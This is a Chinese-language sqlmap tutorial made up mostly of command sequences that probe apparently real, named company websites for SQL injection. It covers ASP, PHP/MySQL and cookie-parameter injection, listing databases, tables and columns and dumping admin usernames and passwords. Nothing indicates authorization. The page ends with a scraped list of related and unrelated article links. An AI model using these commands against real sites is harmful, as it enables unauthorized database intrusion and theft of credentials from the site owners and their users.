*教程

http://www.nxadmin.com/tools/1241.html

一、ASP网站

1.

sqlmap -u “http://www.czypjx.com/News_show.asp?id=110”

-u  “检测是否存在注入”

  返回数据库的名字

查看数据库信息及是否存在注入漏洞(绿色可以注入,黄色不可)

2.

sqlmap -u “http://www.czypjx.com/News_show.asp?id=110”   --tables

猜解出所有表名

选择"user" "admin"

3.

sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --columns -T "user"

--columns   猜列名  根据user表

4.

sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --dump -C "username,password" -T "user"

--dump  下载数据      -C “username,password” 列名

二、PHP网站(一般是mysql的数据库)

1. 检测

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”

2.是否dba权限

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --is-dba

3.列出所有数据库

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --dbs

4.查找自己的数据库

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --current-db

5.查询所有表名

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"

查询所有表名, 根据ggec数据库来查询

6.查询所有的列

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69"  --colums -T “ggec_admin” -D "ggec"

“ggec_admin”是选择的表名

7.查询列的字段

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69"  --dump -C “username,password” -T “ggec_admin” -D "ggec"

三、ASP网站的Cookie注入

1.

sqlmap -u "http://www.wisefund.com.cn/about.asp?id=56“

显示不能注入

修改为

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --cookie “id=56” --level 2

--cookie  “”  这里写ID的参数

有时这样就可以注入了

2.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --tables --cookie “id=56” --level 2

3.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --columns -T “user” --cookie “id=56” --level 2

4.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ”--dump  -C “username,password” -T “user” --cookie “id=56” --level 2

*参考

http://wenku.baidu.com/link?url=2KJ2bgLFI3Fhknk0Pr3fAlMDmLr-jqG6fD9FaBdLqTFbNnHyVLy-NIjpgm5RsBDVoegjVFw1GAqg_QdgqljPUWKcvNyGFLIEVw3aj9ZuYwa

http://drops.wooyun.org/tips/143

http://it.100xuexi.com/view/otdetail/20131031/8158cdfa-e485-46f9-8067-a4ad4891d267.html

http://www.cnblogs.com/hongfei/p/3872156.html

sqlmap(网站数据库注入)的更多相关文章

  1. SQLMAP学习笔记2 Mysql数据库注入

    SQLMAP学习笔记2 Mysql数据库注入 注入流程 (如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息) sqlmap -u "URL" - ...

  2. CentOS 7 通过SQLmap进行SQL注入

    安装SQLmap: IP:192.168.94.11 渗透测试演练系统DVWA: IP:192.168.94.111 通过SQLmap检测SQL注入漏洞 : 1.安装SQLmap漏洞查看工具 2.安装 ...

  3. Access+Mssql+Oracle数据库注入

    Access数据库注入 前言:在常见的注入测试中,由于每个数据库内置架构和应用不同,导致数据库类型将决定注入的手法,Access数据库是小型数据库类型,普遍用于小型WEB应用,其中Access注入手法 ...

  4. SqlMap之数据库操作语句总结

    SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据.我们可以利用它执行特定的命令.查看文件.获取各种数据:当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满 ...

  5. 结合sqlmap进行sql注入过程

    结合sqlmap进行sql注入:(-r后面是通过burp suite抓出来的请求包:-p后面是注入点,即该请求里携带的某个参数) Get请求的注入: ./sqlmap.py -r rss_test.t ...

  6. 【阿里云产品公测】利用PTS服务优化网站数据库读写性能

    [阿里云产品公测]利用PTS服务优化网站数据库读写性能 作者:阿里云用户千鸟 写这个帖子主要也是因为在用PTS测试网站的时候,手动访问网站进入报错页面,主要原因是数据库连接对象存在问题,导致并发多的时 ...

  7. discuz网站数据库迁移

    你的discuz网站数据库迁移,或者修改过改密码后,还要以下相关配置文件修改,才能不会出现1045错误 以windows系统为例:首先登陆远程桌面,在运行中输入cmd,单开命令模式,再输入  net ...

  8. Atitit.故障排除系列---php 程序网站数据库错误排除流程

    Atitit.故障排除系列---php 程序网站数据库错误排除流程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...

  9. Atitit.故障排除系列---php 计划网站数据库错误排除过程

    Atitit.故障排除系列---php 计划网站数据库错误排除过程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...

随机推荐

  1. FWT 等总结 题解

    目录 与卷积: 代码: 或卷积: 代码: 异或卷积: 代码: FST:子集卷积 代码: 例题: CF914G 代码: uoj310[UNR #2]黎明前的巧克力 代码: CF662C Binary T ...

  2. Codeforces Round #598 (Div. 3) A,B,C,D{E,F待补}

    A. Payment Without Change   #include<bits/stdc++.h> using namespace std; #define int long long ...

  3. focusout([data],fn) 当元素失去焦点时触发 focusout 事件。

    focusout([data],fn) 概述 当元素失去焦点时触发 focusout 事件. focusout事件跟blur事件区别在于,他可以在父元素上检测子元素失去焦点的情况.大理石平台怎么样 参 ...

  4. sql时间加减

    /时间转成年月日时分秒select date_format(now(),'%Y%m%d%H%i%S')//时间转成年月日select date_format(now(),'%Y%m%d')//去年此时 ...

  5. Shell 07 项目案例

    案例1:编写一键部署软件脚本 案例2:启动脚本 案例3:编写监控脚本 案例4:编写安全检测脚本 案例5:编写进度显示脚本   一.编写一键部署软件脚本 #!/bin/bash N=$(yum repo ...

  6. jumpserver官方手动安装

    测试环境 CPU: 64位双核处理器 内存: 4G DDR3 数据库:mysql 版本大于等于 5.6 mariadb 版本大于等于 5.5.6 环境 系统: CentOS 7 IP: 192.168 ...

  7. openstack 本地导入镜像.

    网络很慢,直接本地传. openstack image create "Fedora30" --file Fedora-Cloud-Base-30-1.2.x86_64.qcow2 ...

  8. 7月清北学堂培训 Day 2

    今天是林永迪老师的讲授~ 继续昨日的贪心内容. 我们继续看例题: 分析样例的过河方法: 首先1和2先过河,总时间为2: 然后1回来,总时间为3: 然后5和10过河,总时间为13: 然后2回来,总时间为 ...

  9. 2015-2016 ACM ICPC Baltic Selection Contest

    这是上礼拜三的训练赛,以前做过一次,这次仅剩B题没补.题目链接:https://vjudge.net/contest/153192#overview. A题,水题. C题,树形DP,其实是一个贪心问题 ...

  10. Singleton模式(单例模式) 饿汉式和懒汉式

    目的:整个应用中有且只有一个实例,所有指向该类型实例的引用都指向这个实例. 好比一个国家就只有一个皇帝(XXX),此时每个人叫的“皇帝”都是指叫的XXX本人; 常见单例模式类型: 饿汉式单例:直接将对 ...